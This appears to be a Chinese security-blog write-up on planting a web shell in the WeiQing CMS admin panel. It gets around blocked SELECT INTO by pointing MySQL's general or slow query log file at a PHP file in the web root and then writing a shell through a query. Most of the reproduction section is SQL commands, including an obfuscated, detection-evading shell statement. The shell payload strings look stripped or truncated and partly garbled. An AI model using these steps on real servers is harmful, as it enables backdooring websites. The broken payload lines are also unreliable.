001-微擎cms 后台绕过禁用函数写shell

# 微擎cms 后台绕过禁用函数写shell

### 一、漏洞简介

### 二、漏洞影响

### 三、复现过程

1.站点设置里面打开调试

![](/static/lingzu/images/15897255187361.png)

2.执行语句

select into被禁止

![](/static/lingzu/images/15897255270193.png)

3.利用日志文件写shell

“`sql
show variables like ‘%general%’; #查看配置

set global general_log = on; #开启general log模式

set global general_log_file = ‘/var/www/html/1.php’; #设置日志目录为shell地址

select ‘‘ #写入shell
“`

![](/static/lingzu/images/15897255412555.png)

4.SQL查询免杀shell的语句

“`sql
SELECT “‘a’,’pffff’=>’s’,’e’=>’fffff’,’lfaaaa’=>’r’,’nnnnn’=>’t’);$
“`

补充:来自土司@GuoKerSb的分享

在无法修改general_log_file指向的地址且网站用户量多时刻处于查询的状态,我们还可以通过启动slow_query_log(慢查询日志,默认关闭)来写shell

“`sql
set global slow_query_log=1;
set global slow_query_log_file=’/var/www/html/1.php’;
select ‘‘ or sleep(11);
“`

四、参考链接

https://www.vulnbug.com/Exploit/Microcomputer-CMS-bypasses-disabled-Intooutfile-and-safe-dog.html

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容